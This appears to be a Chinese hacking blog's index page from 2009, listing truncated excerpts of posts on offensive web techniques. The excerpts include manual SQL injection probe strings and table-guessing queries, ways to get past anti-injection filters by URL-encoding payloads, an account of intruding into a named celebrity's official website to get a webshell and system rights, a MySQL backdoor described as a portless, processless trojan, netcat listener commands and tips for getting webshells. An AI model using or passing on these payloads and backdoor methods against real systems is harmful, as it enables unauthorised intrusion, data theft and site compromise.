请稍等...页面即将加载完成

PHP的SQL注入完整过程

0 个评论
学了SQL注入的一些技能后,以下正对PHP+MYSQL进行SQL注入的简单实践 首先观察两个MYSQL数据表 用户记录表: CREATE TABLE `php_user` (   `id` int(11) NOT NULL auto_increment,   `username` varchar(20) NOT NULL default “,   `password` varchar(20) NOT NULL default “, &nb...
2009-08-03 / 小小黑客 / 289 views浏览
阅读全文

SQL网站脚本注射语句的经典总结

0 个评论
SQL注射语句1.判断有无注入点 ” ; and 1=1 and 1=2 2.猜表一般的表的名称无非是admin adminuser user pass password 等.. and 0<>(select count(*) from *) and 0<>(select count(*) from admin) —判断是否存在admin这张表 3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页...
2009-08-02 / 小小黑客 / 490 views浏览
阅读全文

入侵杰伦官方网站

0 个评论
文章作者:Flyh4t[脚本安全小组] 信息来源:邪恶八进制信息安全团队(www.eviloctal.com) 本文已经发表在《黑客手册》,转载请署名版权某日在群里聊天,有朋友丢出一个jay官方网站的注入点,闲着无聊就测试了下。没想到最后轻松的得到了系统权限。在取得webshell过程中遇到点困难,也学到了一点东西。 看注射...
2009-08-02 / 小小黑客 / 342 views浏览
阅读全文

SQL注入总结

0 个评论
Sql Injection永远是那么可爱… Sql注射总结(早源于”or”1″=”1) 最重要的表名: select * from sysobjects sysobjects ncsysobjects sysindexes tsysindexes syscolumns systypes sysusers sysdatabases sysxlogins sysprocesses 最重要的一些用户名(默认sql数据库中存在着的...
2009-08-02 / 小小黑客 / 253 views浏览
阅读全文

绕过防SQL注入的方法

1 个评论
我先说说我知道的3种。 1、是cookie中转注入。 2、是转换 例如:www.xxx.com/123.asp?id=234 把id转换成%69%64这种形式。 3、还是转换 以前遇到的一个站,用方法2不成功,然后换一种转换方式就OK了。 就是把and 1=1 转换成%61%6E%64%20%31%3D%31 这种形式的。(就是把注入的语句转换了)转自:
2009-08-02 / 小小黑客 / 400 views浏览
阅读全文

手动注入脚本命令

1 个评论
1.判断是否有注入;and 1=1 ;and 1=2 2.初步判断是否是mssql ;and user>0 3.注入参数是字符’and [查询条件] and ’’=’ 4.搜索时没过滤参数的’and [查询条件] and ’%’=’ 5.判断数据库系统 ;and (select count(*) from sysobjects)>0 mssql ;and (select c...
2009-08-02 / 小小黑客 / 7,864 views浏览
阅读全文

Mysql BackDoor 下载

0 个评论
Mysql BackDoor是一款针对PHP+Mysql服务器开发的后门,后门安装后为Mysql增加一个可以执行系统命令的"state"函数,并且随 Mysql进程启动一个基于Dll的嗅探型后门,从而巧妙地实现了无端口,无进程,无服务的穿墙木马.程序在 WINXP,WIN2003+MYSQL5.0.X下通过. 安装 将Mysql.php传到PHP服务器上,依填上相应...
2009-08-02 / 小小黑客 / 305 views浏览
阅读全文

NC常用命令

0 个评论
命令1:监听命令 nc -l -p port nc -l -p port > e:log.dat nc -l -v -p port 参数解释: -l:监听端口,监听入站信息 -p:后跟本地端口号 -v:显示端口的信息,如果使用-vv的话,则会显示端口更详细的信息 提示:一般大家都爱用-vv nc -l -p 80 这个很简单,监听80端口 如果机器上运行这个命令,端口80被...
2009-08-02 / 小小黑客 / 658 views浏览
阅读全文

从后台得到webshell技巧大汇总

0 个评论
前 言     动网上传漏洞,相信大家拿下不少肉鸡吧。可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然天下,现在这种漏洞已经基本比较难见到了,不排除一些小网站仍然存在此漏洞。在拿站过程中,我们经常费了九牛两虎之力拿到管理员帐号和密码,并顺利进入了后台,虽然此时与拿到网站web...
2009-07-12 / 小小黑客 / 373 views浏览
阅读全文

黑客全面教程-迅雷下载

0 个评论
第一课脚本入侵动画:实验环境之虚拟机的搭建   教程下载地址:http://bbs.hack95.com/jhk/xuniji.rar 第二课脚本入侵动画:个人电脑优化配置推荐方案(上) 教程下载地址:http://bbs.hack95.com/jhk/diannao1.rar 续:脚本入侵动画:个人电脑优化推荐配置方案2(中) 教程下载地址:http://bbs....
2009-07-07 / 小小黑客 / 364 views浏览
阅读全文